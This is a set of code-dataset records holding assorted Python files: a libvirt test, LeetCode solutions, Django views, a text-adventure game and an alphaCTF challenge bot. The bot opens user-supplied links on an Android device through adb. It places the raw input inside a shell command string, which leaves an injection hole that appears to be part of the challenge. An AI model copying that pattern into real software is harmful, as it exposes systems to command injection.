\"\"\"\n # Both 'nosharepages' and 'locked' are supported since 1.0.6\n if not libvirt_version.version_compare(1, 0, 6):\n test.cancel(\"Element is not supported in current\"\n \" libvirt version\")\n qemu_flags = []\n no_sharepages = \"yes\" == kwargs.get(\"nosharepages\", \"no\")\n locked = \"yes\" == kwargs.get(\"locked\", \"no\")\n if no_sharepages:\n # On RHEL6, the flag is 'redhat-disable-KSM'\n # On RHEL7 & Fedora, the flag is 'mem-merge=off'\n qemu_flags.append(['mem-merge=off', 'redhat-disable-KSM'])\n if locked:\n if not libvirt_version.version_compare(5, 3, 0):\n qemu_flags.append(\"mlock=on\")\n else:\n 
qemu_flags.append(\"mem-lock=on\")\n memtune_xml = vm_xml.VMMemTuneXML()\n memtune_xml.hard_limit = vmxml.max_mem * 4\n vmxml.memtune = memtune_xml\n vmxml.sync()\n try:\n vm_xml.VMXML.set_memoryBacking_tag(vmxml.vm_name,\n hpgs=False,\n nosp=no_sharepages,\n locked=locked)\n logging.debug(\"xml updated to %s\", vmxml.xmltreefile)\n except Exception as detail:\n logging.error(\"Update VM XML fail: %s\", detail)\n return qemu_flags\n\n\ndef run(test, params, env):\n \"\"\"\n Test libvirt support features in qemu cmdline.\n\n 1) Config test feature in VM XML;\n 2) Try to start VM;\n 3) Check corresponding feature flags in qemu cmdline;\n 4) Login VM to test feature if necessary.\n \"\"\"\n vm_name = params.get(\"main_vm\", \"avocado-vt-vm1\")\n vm = env.get_vm(vm_name)\n expect_fail = \"yes\" == params.get(\"expect_start_vm_fail\", \"no\")\n expect_define_vm_fail = 'yes' == params.get('expect_define_vm_fail', 'no')\n test_feature = params.get(\"test_feature\")\n # All test case Function start with 'test_feature' prefix\n testcase = globals()['config_feature_%s' % test_feature]\n test_feature_attr = params.get(\"test_feature_attr\", '').split(\",\")\n test_feature_valu = params.get(\"test_feature_valu\", '').split(\",\")\n # Parameters for test case\n if len(test_feature_attr) != len(test_feature_valu):\n test.error(\"Attribute number not match with value number\")\n test_dargs = dict(list(zip(test_feature_attr, test_feature_valu)))\n if expect_define_vm_fail:\n test_dargs.update({'expect_define_vm_fail': expect_define_vm_fail,\n 'expected_msg': params.get('expected_msg', '')})\n if vm.is_alive():\n vm.destroy()\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n vmxml_backup = vmxml.copy()\n virsh_dargs = {'debug': True, 'ignore_status': False}\n\n if 'ppc64le' in platform.machine().lower() and test_feature == 'pv_eoi':\n if not libvirt_version.version_compare(6, 0, 0):\n test.cancel('Feature %s is supported since version 6.0.0' % test_feature)\n try:\n # Run test case\n qemu_flags = testcase(test, vmxml, **test_dargs)\n if not qemu_flags and expect_define_vm_fail:\n return\n result = virsh.start(vm_name, **virsh_dargs)\n libvirt.check_exit_status(result, expect_fail)\n\n # Check qemu flag\n vm_pid = vm.get_pid()\n with open(\"/proc/%s/cmdline\" % vm_pid) as cmdline_f:\n cmdline_content = cmdline_f.read()\n logging.debug(\"VM cmdline:\\n%s\",\n cmdline_content.replace('\\x00', ' '))\n msg = \"Find '%s' in qemu cmdline? %s\"\n found_flags = []\n index = 0\n for flag in qemu_flags:\n # Here, flag could be a list, so uniform it to list for next\n # step check. And, check can pass if any element in the list\n # exist in cmdline\n if not isinstance(flag, list):\n flag = [flag]\n found_f = []\n for f in flag:\n if f in cmdline_content:\n found_f.append(True)\n break\n else:\n found_f.append(False)\n found_flags.append(any(found_f))\n logging.info(msg % (flag, found_flags[index]))\n index += 1\n if False in found_flags:\n test.fail(\"Not find all flags\")\n finally:\n vmxml_backup.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/libvirt_qemu_cmdline.py","file_name":"libvirt_qemu_cmdline.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"14939540799","text":"#!/usr/bin/python3\n\nimport subprocess\n\n\nprint('So did you find anything?\\nyou can send me the link here',flush=True)\n\nlink = input('link: ')\n\nprint('ok, i will click on it',flush=True)\n\nsubprocess.call(\n [\"adb\", \"shell\", f\"am start -a android.intent.action.VIEW -d '{link}' com.alphactf.deepnews\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL,\n)\n","repo_name":"vvxhid/alphaCTF-2022","sub_path":"reverse/deepnews/chall/messenger/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"19076276722","text":"from marshmallow import post_load\nfrom marshmallow.decorators import post_dump\n\nfrom app.extensions.marshmallow_ext import ma\nfrom app.models.commerce import Commerce\nfrom app.models.user import User\n\n\nclass Commerce_Schema(ma.Schema):\n class Meta:\n fields = (\n \"id\",\n \"id_user\",\n \"trading_name\",\n \"company_name\",\n \"cover_path\",\n \"segment\",\n \"description\",\n \"cell_number\",\n \"email\",\n \"street\",\n \"number\",\n \"complement\",\n \"neighborhood\",\n \"city\",\n \"state\",\n \"zipcode\",\n \"created_at\",\n \"updated_at\",\n )\n\n @post_load\n def make_commerce(self, data, **kwargs):\n return Commerce(**data)\n\n @post_dump(pass_many=True)\n def serialize(self, data, many, **kwargs):\n if type(data) is not dict:\n for commerce in data:\n user = User.query.filter_by(id=commerce[\"id_user\"]).first()\n commerce['user'] = {\n 'name': user.name,\n 'email': user.email\n }\n return data","repo_name":"afonsomedeiros/LogoAliAPI","sub_path":"app/serializer/commerce.py","file_name":"commerce.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19521659901","text":"class Solution:\n def add(self, a: int, b: int) -> int:\n z = 0xffffffff\n a, b = a & z, b & z\n while b != 0:\n a, b = a ^ b, ((a & b) << 1) & z\n if a > 0x7fffffff:\n a = ~(a ^ z)\n return a\n\na, b = -2, 1\nc = Solution()\nprint(c.add(a, b))","repo_name":"zhulf0804/Coding.Python","sub_path":"剑指offer/65_g_h_不用加减乘除做加法.py","file_name":"65_g_h_不用加减乘除做加法.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"380445849","text":"from PIL import Image\nimport random as rd\n\nimgx = 512\nimgy = 512\nimage = Image.new(\"RGB\", (imgx, imgy))\nfor x in range(imgx):\n\tfor y in range(imgy):\n\t\timage.putpixel((x,y),(0,0,0))\nsnakenum = 65\nr= 0\ng = 0\nb = 0\nlol = 0\nglobal turn\nglobal snakey\nturn = 0\n\n\ndef pr():\n\tglobal turn, snakey\n\tturn = snakey\n\nfor x in range(snakenum):\n\tsnakey = 0\n\tr = rd.randrange(255)\n\tg = rd.randrange(255)\n\tb = rd.randrange(255)\n\tsnakex = rd.randrange(imgx)\n\t\n\tfor x in range(3000):\n\t\tif snakey <= 510:\n\t\t\tlol = rd.randrange(10)\n\t\t\tif lol < 2:\n\t\t\t\tif snakex != 0:\n\t\t\t\t\tsnakex -= 1\n\t\t\t\telse:\n\t\t\t\t\tif snakey < imgy:\n\t\t\t\t\t\tsnakey +=1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\t\t\telif lol > 7:\n\t\t\t\tif snakex != imgx:\n\t\t\t\t\tsnakex += 1\n\t\t\t\telse:\n\t\t\t\t\tif snakey < imgy:\n\t\t\t\t\t\tsnakey += 1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\t\t\telse:\n\t\t\t\tif snakey < imgy:\n\t\t\t\t\tsnakey += 1\n\t\t\t\timage.putpixel((snakex, snakey),(r,g,b))\n\t\t\t\tpr()\n\nimage.save(\"snake.png\", \"PNG\")","repo_name":"miaalexkatz/CS550","sub_path":"snakes.py","file_name":"snakes.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12370453730","text":"#\n# @lc app=leetcode.cn id=701 lang=python3\n#\n# [701] 二叉搜索树中的插入操作\n# insert-into-a-binary-search-tree\n\n# 给定二叉搜索树(BST)的根节点和要插入树中的值,将值插入二叉搜索树。\n# 返回插入后二叉搜索树的根节点。\n# 保证原始二叉搜索树中不存在新值。\n# 注意,可能存在多种有效的插入方式,只要树在插入后仍保持为二叉搜索树即可。 你可以返回任意有效的结果。\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:\n return self.insertIntoBST1(root, val)\n\n @staticmethod\n def insertIntoBST1(root, val):\n def helper(node):\n if node is None:\n return TreeNode(val)\n if val > node.val:\n node.right = helper(node.right)\n else:\n node.left = helper(node.left)\n return node\n return helper(root)\n\n @staticmethod\n def insertIntoBST2(root, val):\n if root is None:\n return TreeNode(val)\n\n node, parent = root, root\n while node:\n parent = node\n node = parent.left if val < parent.val else parent.right\n \n if val < parent.val:\n parent.left = TreeNode(val)\n elif val > parent.val:\n parent.right = TreeNode(val)\n\n return root\n# @lc code=end\n\n","repo_name":"yekingyan/leetcode","sub_path":"701.二叉搜索树中的插入操作.py","file_name":"701.二叉搜索树中的插入操作.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35528340811","text":"import numpy as np\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n long = min(len(matrix), len(matrix[0]))\n matrix = np.array(matrix).astype('int')\n\n for wid in range(long,0,-1):\n i,j = 0, 0\n for i in range(len(matrix) - wid + 1):\n for j in range(len(matrix[0]) - wid + 1):\n print(i,j,wid)\n if np.sum(matrix[i:i+wid,j:j+wid]) == wid**2:\n return wid**2\n return 0\n \n############################################################################# \n \nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n m = len(matrix)\n n = len(matrix[0])\n cache = [[int(matrix[i][j]) if(i == 0 or j == 0) else 0 for j in range(n)] for i in range(m)]\n \n maxL = 0\n for i in range(m):\n for j in range(n):\n if(matrix[i][j] == '1' and i > 0 and j > 0):\n cache[i][j] = min(cache[i-1][j], cache[i][j-1], cache[i-1][j-1]) + 1\n maxL = max(cache[i][j], maxL)\n \n \n return(maxL**2) \n","repo_name":"KaiaX926/Leetcode","sub_path":"221 Maximal Square.py","file_name":"221 Maximal Square.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70524949659","text":"\"\"\"Classes, functions, and data structures to create \"Builders\" for circuits.\n\"\"\"\n\nfrom functools import partial\nfrom typing import Any, Callable\n\nfrom qcware_transpile.circuits import Circuit\nfrom qcware_transpile.gates import Dialect\nfrom qcware_transpile.instructions import Instruction\n\n\nclass Builder:\n def __init__(self, dialect: Dialect):\n self.dialect = dialect\n self.instructions: list[Instruction] = []\n\n def add_instruction(\n self, gate_name: str, bits: list, parameters: dict, metadata: dict\n ) -> \"Builder\":\n self.instructions.append(\n Instruction(\n gate_def=self.dialect.gate_named(gate_name),\n bit_bindings=bits,\n parameter_bindings=parameters,\n metadata=metadata,\n )\n )\n return self\n\n\ndef create_builder(dialect: Dialect, to_native_func: Callable[[Circuit], Any]):\n \"\"\"\n Creates a builder object, starting from a basically empty class and\n adding functions to \"build\" a circuit from scratch based on the gates\n in the dialect and the parameters involved.\n \"\"\"\n result = Builder(dialect)\n\n def create_method(gate_def):\n def add_this_gate(self: Builder, *args, **kwargs):\n gate_name = gate_def.name\n bits = list(args)\n parameters: dict = kwargs\n metadata: dict = dict()\n self.add_instruction(gate_name, bits, parameters, metadata)\n return self\n\n return add_this_gate\n\n for gate_def in dialect.gate_defs:\n\n # now bind this method to the object instance. It may be better to create\n # a class dynamically and then create members of that class; let's try this\n # first.\n # see https://newbedev.com/adding-a-method-to-an-existing-object-instance\n # for descriptions\n setattr(result, gate_def.name, partial(create_method(gate_def), result))\n\n setattr(\n result,\n \"circuit\",\n partial(\n lambda self: Circuit.from_instructions(\n self.dialect.name, self.instructions\n ),\n result,\n ),\n )\n setattr(\n result,\n \"native_circuit\",\n partial(lambda self: to_native_func(self.circuit()), result),\n )\n\n return result\n","repo_name":"qcware/qcware_transpile","sub_path":"qcware_transpile/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35838207413","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom django.contrib import messages\nimport bcrypt\nfrom datetime import date\n\ndef register(request):\n\treturn render(request, 'index.html') \n\ndef createuser(request):\n\tprint(request.POST)\n\terrors = User.objects.userValidator(request.POST)\n\tif len(errors) > 0:\n\t\tfor key, value in errors.items():\n\t\t\tmessages.error(request, value)\n\t\treturn redirect('/')\n\telse:\n\t\thashedpassword = bcrypt.hashpw(request.POST ['pw'].encode(), bcrypt.gensalt()).decode()\n\t\tnewuser = User.objects.create(firstName = request.POST['fname'], lastName = request.POST ['lname'], email = request.POST['useremail'], password = hashedpassword )\n\t\tprint (newuser.id)\n\t\trequest.session['loggedInID'] = newuser.id\n\treturn redirect('/book')\n\ndef book(request):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tcontext = {\n\t\t'loggedUser': loggedInUser,\n\t\t'allbooks': Book.objects.all()\n\t}\n\treturn render (request, 'book.html', context)\t\n\ndef login(request):\n\tvalidationErrors = User.objects.loginValidator(request.POST)\n\tif len(validationErrors) > 0:\n\t\tfor key, value in validationErrors.items():\n\t\t\tmessages.error(request, value)\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(email = request.POST['useremail'])\n\tprint(\"*******\")\n\tprint(loggedInUser)\n\tprint(\"********\")\n\trequest.session['loggedInID'] = loggedInUser.id\n\treturn redirect('/book')\n\ndef add(request):\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tnewBook = Book.objects.create(title = request.POST['title'], desc = request.POST['desc'], creator = loggedInUser)\n\treturn redirect('/book')\n\ndef delete(request, bookId):\n\tbook = Book.objects.get (id = bookId)\n\tbook.delete()\n\treturn redirect('/book')\n\ndef edit(request, bookId):\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get (id = bookId)\n\tcontext = {\n\t'loggedUser' : loggedInUser,\n\n\t}\n\treturn redirect('edit.html', context)\n\ndef update(request, bookId):\n\tprint(request.POST)\n\tbook = Book.objects.get(id = bookId)\n\tbook.title = request.POST['title']\n\tbook.desc = request.POST['desc']\n\tbook.save()\n\treturn redirect('/book')\n\ndef display(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tcontext = {\n\t\t'loggedUser' : loggedInUser,\n\t\t'book': Book.objects.get(id=bookId)\n\t}\n\treturn render(request, 'showbook.html', context)\n\ndef addfavor(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get(id=bookId)\n\tbook.like.add(loggedInUser)\n\treturn redirect('/book')\n\t\ndef removefavor(request, bookId):\n\tif 'loggedInID' not in request.session:\n\t\treturn redirect('/')\n\tprint(request.POST)\n\tloggedInUser = User.objects.get(id=request.session['loggedInID'])\n\tbook = Book.objects.get(id=bookId)\n\tbook.like.remove(loggedInUser)\n\treturn redirect('/book')\n\ndef logout(request):\n\trequest.session.clear()\n\treturn 
redirect('/')","repo_name":"MoDev20/Zaki","sub_path":"favoriteBooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"83055538","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 14 16:44:42 2021\r\n@author: Eric Born\r\n!!! TODO !!!\r\ncreate room class which stores description text and inventory list for items \r\nto be taken by player\r\nFind_Item # looks for item of same class \r\nKilled\r\nShowDeathScreen\r\nRestart\r\n\"\"\"\r\n#import inspect\r\nimport random as rand\r\n\r\nlocation_dict: dict = {'start': ('This is the starting room, choose to inspect'\r\n ' the room by typing inspect. Move to another area by '\r\n 'typing move and the direction. Pickup an item by '\r\n 'typing pickup item name. Attack by typing attack and '\r\n 'the monsters name. Equip an item by typing equip and '\r\n 'the items name. Use an item by typing use and the '\r\n 'items name. Check your stats by typing stats.'),\r\n 'north': ('The north side of the castle, There is a '\r\n 'rusty sword lying on the ground. You can move south'),\r\n 'east': 'The east side of the castle, you can move west',\r\n 'south': 'The south side of the castle, you can move north',\r\n 'west': 'The west side of the castle, you can move to the end',\r\n 'end': 'The dragon'}\r\n\r\ndamage_type_dict: dict = {'Physical': 'physical_resistance',\r\n 'Cold': 'cold_resistance',\r\n 'Fire': 'fire_resistance',\r\n 'Lightning': 'lightning_resistance'}\r\n\r\ngame_active = True \r\n\r\nclass Location:\r\n def __init__(self, location: str):\r\n self.location = location\r\n \r\n #def Get_Description(self):\r\n \r\n\r\nclass BaseItem:\r\n\r\n # base item constructor\r\n def __init__(self, name: str, description: str, use_action: str, \r\n quantity: int):\r\n self.name = name\r\n self.description = description\r\n self.use_action = use_action\r\n self.quantity = quantity\r\n\r\n # set the items quantity\r\n def set_quantity(self, quantity):\r\n if self.quantity + quantity >= 0:\r\n self.quantity = self.quantity + quantity\r\n else:\r\n return('Invalid amount')\r\n\r\n # used to get the items quantity\r\n def get_quantity(self):\r\n return self.quantity\r\n \r\n # checks if an item is valid\r\n # def check_if_item(item):\r\n # return isinstance(item, BaseItem)\r\n \r\n def use_item(item):\r\n return()\r\n \r\nclass FoodItem(BaseItem):\r\n heal_amount: int = 5\r\n \r\n def use_item(self, player: str, item: str):\r\n # check for valid\r\n if(player and player.inventory.Find_Item(item)):\r\n player.Set_Health(self.heal_amount)\r\n else:\r\n return()\r\n\r\nclass Melee_Weapon(BaseItem):\r\n slot: str = ''\r\n weapon_type = 'Fists'\r\n equipped = 'n'\r\n damage_amount: list = [1, 3]\r\n damage_type: str = 'Physical'\r\n attack_type: str = 'Punch'\r\n hit_chance: int = 5\r\n \r\nclass Armor(BaseItem):\r\n slot: str = ''\r\n equipped = 'n'\r\n armor_type: str = ''\r\n stats: dict = {'physical_resistance': 0,\r\n 'cold_resistance': 0,\r\n 'lightning_resistance': 0,\r\n 'fire_resistance': 0}\r\n \r\n \r\n# create a weapon\r\nrusty_sword = Melee_Weapon('Rusty Sword', 'A Rusty Sword', 'Slash', 1)\r\n\r\nrusty_breastplate = Armor('Rusty Breastplate', 'A Rusty Breastplate', 'Equip', 1)\r\nrusty_breastplate.slot = 'body_armor'\r\nrusty_breastplate.stats['physical_resistance'] = 5\r\n\r\n# equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n# 'hand_slot_2': 'Empty',\r\n# 'helmet': 'Empty',\r\n# 'body_armor': 'Empty',\r\n# 'gloves': 'Empty',\r\n# 'boots': 'Empty',\r\n# 'ring1': 'Empty',\r\n# 'ring2': 'Empty',\r\n# 'amulet': 'Empty'}\r\n\r\n# equip_dict[rusty_breastplate.slot] = rusty_breastplate\r\n# 
print(equip_dict[rusty_breastplate.slot])\r\n\r\n\r\n# if rusty_breastplate.slot in equip_dict:\r\n# print('yes')\r\n# else:\r\n# print('no')\r\n\r\n# def Equip_Item(self, item):\r\n# if self.inventory.Find_Item(item):\r\n# if item.slot in self.equip_dict:\r\n# self.equip_dict[item.slot] = item\r\n \r\n# else:\r\n# return('No slot')\r\n\r\n\r\n# class Command():\r\n# def execute():\r\n# return()\r\n \r\n# class Move(Command):\r\n \r\n\r\nclass Inventory:\r\n def __init__(self):\r\n self.item_list = []\r\n \r\n # try to add an item to the players inventory\r\n # just performs checks then performs add to inventory if successful\r\n def Try_Add_Item(self, item_to_give):\r\n if (item_to_give.get_quantity() > 0):\r\n self.Add_Item(item_to_give)\r\n else:\r\n return('Invalid item')\r\n \r\n # add the item to the players item list\r\n def Add_Item(self, item: str):\r\n new_item = item\r\n new_item.set_quantity(item.get_quantity())\r\n self.item_list.append(new_item)\r\n #return(new_item)\r\n \r\n def Remove_Item(self, item: str):\r\n if item in self.item_list:\r\n self.item_list.remove(item)\r\n \r\n # returns all inventory items\r\n def Get_Inventory(self):\r\n if len(self.item_list) > 0:\r\n for item in self.item_list:\r\n print(item.name)\r\n else:\r\n print('No items')\r\n \r\n def Find_Item(self, item: str):\r\n if len(self.item_list) > 0:\r\n for inv_item in self.item_list:\r\n if item == inv_item:\r\n print(item.name)\r\n return(inv_item)\r\n else:\r\n print('No Items')\r\n\r\nclass Player:\r\n \r\n # Create a dict with available actions?\r\n #actions: dict = {}\r\n \r\n # physical_resistance: int = 5\r\n # cold_resistance: int = 1\r\n # lightning_resistance: int = 1\r\n # fire_resistance: int = 1\r\n \r\n resistance_dict: dict = {'physical_resistance': 5,\r\n 'cold_resistance': 1,\r\n 'lightning_resistance': 1,\r\n 'fire_resistance': 1}\r\n\r\n # initialize fists as players weapon\r\n \r\n \r\n equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n 'hand_slot_2': 'Empty',\r\n 'helmet': 'Empty',\r\n 'body_armor': 'Empty',\r\n 'gloves': 'Empty',\r\n 'boots': 'Empty',\r\n 'ring1': 'Empty',\r\n 'ring2': 'Empty',\r\n 'amulet': 'Empty'}\r\n \r\n # equipment = [hand_slot_1, hand_slot_2, helmet, body_armor, gloves, boots,\r\n # ring1, ring2, amulet]\r\n \r\n # set starting accuracy and evasion to 5\r\n accuracy: int = 5\r\n evasion_rating: int = 5\r\n \r\n # Player constructor\r\n def __init__(self, name: str, location: str = 'Start', health: int = 100):\r\n self.name = name\r\n self.health = health\r\n self.inventory = Inventory()\r\n self.location = location \r\n \r\n def Player_command():\r\n command = input('Please choose a command: ')\r\n # if command == 'quit':\r\n # quit_command()\r\n \r\n \r\n def Return_status(self):\r\n print('Your name is ' + str(self.name) + \r\n '\\nYour location is ' + str(self.location) + \r\n '\\nYour health is ' + str(self.Get_health())) #+\r\n # '\\nYour hunger is ' + str(self.hunger) + \r\n # '\\nYour thirst is ' + str(self.thirst))\r\n\r\n \r\n # used to move the player\r\n def Set_Location(self, location: str):\r\n if location in location_dict:\r\n self.location = location\r\n return('Moved to the ' + str(location))\r\n else:\r\n return('Invalid move')\r\n \r\n # used to find where the player currently is\r\n def Get_Location(self):\r\n return(self.location.lower())\r\n \r\n def Inspect_Room(self):\r\n print(location_dict[self.Get_Location()])\r\n \r\n # moved to inventory class\r\n # used to pick up items\r\n # def 
Loot_Item(self, item_to_give):\r\n # self.item_list.append(item_to_give)\r\n \r\n # kill event for the player\r\n def Killed(self, damage_event, damage_causer):\r\n print('You were killed by ' + str(damage_causer) + ' with a ' + \r\n str(damage_event))\r\n #return(\"Dead\")\r\n #ShowDeathScreen(damage_causer)\r\n \r\n # set the players health\r\n def Set_Health(self, change_amount):\r\n self.health = self.health + change_amount\r\n \r\n # !!! TODO !!!\r\n # need to find a better method for positive/negative stat changes\r\n def Set_Stats(self, direction, item):\r\n if direction == 'positive':\r\n for resistance in item.stats:\r\n self.resistance_dict[resistance] = (self.resistance_dict[resistance] + \r\n item.stats[resistance]) \r\n else:\r\n for resistance in item.stats:\r\n self.resistance_dict[resistance] = (self.resistance_dict[resistance] - \r\n item.stats[resistance]) \r\n def Get_Stats(self):\r\n for resistance in self.resistance_dict:\r\n print(self.resistance_dict[resistance])\r\n\r\n # damage the player,\r\n # takes damage event, amount and causer\r\n # sets health with negative change_amount\r\n def Take_Damage(self, damage_event, change_amount, damage_causer): \r\n \r\n self.Set_Health(-change_amount)\r\n # concat self, type of attack, amount and attacker then return\r\n damage_message = (str(self.name) + ' was hit by a ' + str(damage_event) \r\n + ' for ' + str(change_amount) + \r\n ' points of damage from ' + str(damage_causer.name) \r\n + '!')\r\n\r\n # check if lost all health, otherwise return damage message\r\n if self.health <= 0:\r\n self.Killed(damage_event, damage_causer)\r\n else: \r\n return(damage_message)\r\n\r\n # check the players health \r\n def Get_health(self):\r\n return(self.health)\r\n \r\n # use item and call remove_item\r\n def Use_Item(self, item):\r\n if self.inventory.Find_Item(item):\r\n item.use_item(self, item)\r\n self.Remove_Item(item)\r\n else:\r\n return('No item')\r\n \r\n # removes an item from the inventory item_list\r\n def Remove_Item(self, item):\r\n self.inventory.item_list.remove(item)\r\n \r\n # equip item\r\n # check if item in inventory, has a valid slot.\r\n # if already equipped, call unequip\r\n # otherwise set equip to yes, put in dict and change stats\r\n def Equip_Item(self, item):\r\n if self.inventory.Find_Item(item):\r\n if item.slot in self.equip_dict:\r\n if item.equipped == 'y':\r\n self.Unequip_Item(item)\r\n return('Unequipped item') \r\n else:\r\n self.equip_dict[item] = item\r\n self.Set_Stats('positive', item)\r\n item.equipped = 'y'\r\n else:\r\n return('No slot found')\r\n else:\r\n return('No item found')\r\n\r\n # unequip item\r\n # check if item is in equipment dictionary and is equipped\r\n # set dict to empty, subtract stats, set equipped to no\r\n def Unequip_Item(self, item):\r\n if item in self.equip_dict and item.equipped == 'y':\r\n self.equip_dict[item] = 'Empty'\r\n self.Set_Stats('negative', item)\r\n item.equipped = 'n'\r\n return('Unequipped item')\r\n else:\r\n return('No item')\r\n\r\n # check if player is hit by enemy\r\n def hit_check(self, attacker):\r\n \r\n # players evasion and resistance\r\n evade: int = self.evasion_rating\r\n res_dict: dict = self.resistance_dict\r\n \r\n # cold_res: int = attacked.resistance_dict['cold_resistance']\r\n # lightning_res: int = attacked.resistance_dict['lightning_resistance']\r\n # fire_res: int = attacked.'fire_resistance'\r\n \r\n # attackers accuracy and weapon\r\n accuracy = attacker.accuracy\r\n weapon = attacker.weapon\r\n \r\n # miss check\r\n # if 
random 0-99 > weapon hit chance * character accuracy, miss is true\r\n # Base chance to miss is 75%\r\n if (rand.randrange(0, 100) > \r\n rand.randrange(0, weapon.hit_chance * accuracy)):\r\n return('Miss')\r\n \r\n # if 0-evasion_rating > random 0-99, evade is true\r\n # base chance to evade is 5%\r\n elif (rand.randrange(0, evade) >\r\n rand.randrange(0, 100)):\r\n return('Evade')\r\n \r\n # if neither a miss or an evade, the hit landed\r\n else:\r\n # Calculate damage\r\n # +1 included to hit weapons cap number \r\n # since range stops 1 below the value\r\n damage_roll: int = rand.randrange(weapon.damage_amount[0],\r\n weapon.damage_amount[1] + 1)\r\n \r\n # calculate damage after resistance\r\n # damage roll - the roll multiplied by resistance for particular\r\n # weapon type\r\n damage_roll: int = damage_roll - (damage_roll * \r\n (res_dict[damage_type_dict[\r\n weapon.damage_type]] * 0.01))\r\n \r\n return(self.Take_Damage(weapon.use_action, damage_roll, attacker))\r\n \r\n \r\n # def Melee_Attack(self, weapon):\r\n # damage = self.hit_check(attacked, damage_type)\r\n\r\n\r\n# class Enemy(Player):\r\n# self.enemy_type = enemy_type\r\n\r\n\r\n\r\nTim = Player('Tim')\r\n\r\nTim.inventory.Add_Item(rusty_sword)\r\nTim.inventory.Add_Item(rusty_breastplate)\r\n\r\nTim.inventory.Get_Inventory()\r\n\r\nTim.Get_Stats()\r\n\r\nTim.Equip_Item(rusty_breastplate)\r\n\r\n# Tim.Get_Stats()\r\n\r\nTim.Unequip_Item(rusty_breastplate)\r\n\r\n# Tim.Get_Stats()\r\n\r\n# inv_test = Inventory()\r\n\r\n# inv_test.Add_Item(rusty_breastplate)\r\n\r\n# equip_dict = {'hand_slot_1': Melee_Weapon('Fists', 'Punching machines', 'Punch', 1),\r\n# 'hand_slot_2': 'Empty',\r\n# 'helmet': 'Empty',\r\n# 'body_armor': 'Empty',\r\n# 'gloves': 'Empty',\r\n# 'boots': 'Empty',\r\n# 'ring1': 'Empty',\r\n# 'ring2': 'Empty',\r\n# 'amulet': 'Empty'}\r\n \r\n# equip item\r\n# TODO\r\n# add check for already equipped\r\n\r\n# print(rusty_breastplate.slot)\r\n\r\n# test_stats = {'phys': 5}\r\n\r\n# if inv_test.Find_Item(rusty_breastplate):\r\n# if rusty_breastplate.slot in equip_dict:\r\n# if rusty_breastplate.equipped == 'y':\r\n# #Unequip_Item(rusty_breastplate)\r\n# equip_dict[rusty_breastplate.slot] = 'Empty'\r\n# #Set_Stats('negative', item)\r\n# test_stats['phys'] -= 5 \r\n# else:\r\n# #print(equip_dict[rusty_breastplate.slot])\r\n# equip_dict[rusty_breastplate.slot] = rusty_breastplate\r\n# test_stats['phys'] += 5\r\n# rusty_breastplate.equipped = 'y'\r\n# else:\r\n# print('No slot')\r\n\r\n\r\n\r\n# def Equip_Item(self, item):\r\n# if self.inventory.Find_Item(item):\r\n# if item.slot in self.equip_dict:\r\n# if item.equipped == 'y':\r\n# Unequip_Item(item) \r\n# else:\r\n# self.equip_dict[item] = item\r\n# self.Set_Stats('positive', item)\r\n# item.equipped = 'y'\r\n# else:\r\n# return('No slot')\r\n\r\n# # unequip item\r\n# def Unequip_Item(self, item):\r\n# if item in self.equip_dict:\r\n# self.equip_dict[item] = 'Empty'\r\n# self.Set_Stats('negative', item)\r\n# else:\r\n# return('No item')\r\n\r\n# Jim = Player('Jim')\r\n\r\n# Tim.Get_health()\r\n\r\n# Tim.hit_check(Jim)\r\n\r\n# #Tim.Take_Damage('Slash', -10, 